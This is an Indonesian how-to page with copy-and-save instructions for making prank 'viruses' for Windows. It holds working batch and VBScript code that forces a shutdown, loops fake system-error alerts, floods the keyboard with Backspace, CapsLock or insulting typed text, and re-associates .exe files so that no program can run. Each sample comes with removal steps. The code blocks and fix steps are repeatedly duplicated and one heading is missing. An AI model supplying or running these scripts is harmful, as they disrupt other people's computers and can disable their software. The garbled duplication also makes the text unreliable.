Membuat Virus Force Shut down
- Salin kode script berikut ini
@echo off
msg * I don't like you
shutdown -c "Error" -s
msg * I don't like you
shutdown -c "Error" -s
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.bat) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus Force Shut down.bat
Cara Mengatasi :
Hidupkan Kembali Komputer/ Laptop anda
- Salin kode script berikut ini
@echo off
:Loop1
msg * System Error!!!
msg * Virus Alert!
msg * Please Restart Your Device
msg * Format Partition Now
GOTO Loop1
:Loop1
msg * System Error!!!
msg * Virus Alert!
msg * Please Restart Your Device
msg * Format Partition Now
GOTO Loop1
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.bat) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus Pesan Error.bat
Cara Mengatasi :
Close CMD yang terbuka, klik OK pada pesan sampai hilang
Membuat Virus Tombol Backspace Error
- Salin kode script berikut ini
MsgBox "Keyboard Anda Error"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.vbs) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus Tombol Backspace Error.vbs
Cara Mengatasi :
1. Buka Task Manager ( tekan Ctrl+Alt+delete → Pilih Task Manager )
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
Membuat Virus CAPSLOCK
- Salin kode script berikut ini
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.vbs) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus CAPSLOCK.vbs
Cara Mengatasi :
1. Buka Task Manager ( tekan Ctrl+Alt+delete → Pilih Task Manager )
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
Membuat Virus Keyboard KAMPRET
- Salin kode script berikut ini
MsgBox "Keyboard Anda Error"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{K}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{M}"
wshshell.sendkeys "{P}"
wshshell.sendkeys "{R}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{T}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{ }"
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{K}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{M}"
wshshell.sendkeys "{P}"
wshshell.sendkeys "{R}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{T}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{ }"
loop
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.vbs) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus Keyboard KAMPRET.vbs
Cara Mengatasi :
1. Buka Task Manager ( tekan Ctrl+Alt+delete → Pilih Task Manager )
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
Membuat Virus Kena Hukuman
- Salin kode script berikut ini
MsgBox "Kamu di Hukum"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{S}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{Y}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{B}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{R}"
wshshell.sendkeys "{J}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{J}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{T}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{D}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{K}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{K}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{M}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{U}"
wshshell.sendkeys "{L}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{Y}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{L}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{ }"
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{S}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{Y}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{B}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{R}"
wshshell.sendkeys "{J}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{J}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{T}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{D}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{K}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{K}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{M}"
wshshell.sendkeys "{E}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{U}"
wshshell.sendkeys "{L}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{N}"
wshshell.sendkeys "{Y}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{ }"
wshshell.sendkeys "{L}"
wshshell.sendkeys "{A}"
wshshell.sendkeys "{G}"
wshshell.sendkeys "{I}"
wshshell.sendkeys "{ }"
loop
- Klik File → Save as → beri nama terserah anda, jangan lupa beri ekstensi (.vbs) → Ganti Save as type menjadi All Files → Klik Save.
Contoh : Virus Kena Hukuman.vbs
Cara Mengatasi :
1. Buka Task Manager ( tekan Ctrl+Alt+delete → Pilih Task Manager )
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
2. Cari Microsoft Ⓡ Windows Based Script Host / wsscript.exe → Klik End Task
3. Selesai
📛Membuat Virus Hank📛
- Ketik Kode Berikut ini :
ASSOC.exe=.hank
- Enter
Peringatan : Aplikasi yang berextensi .exe akan lumpuh tidak bisa berjalan, seperti game atau file2 exe lainnya
Cara Mengatasi :
1. Buka CMD
2. Ketikan ASSOC.exe=EXEFILE
2. Ketikan ASSOC.exe=EXEFILE
3. Enter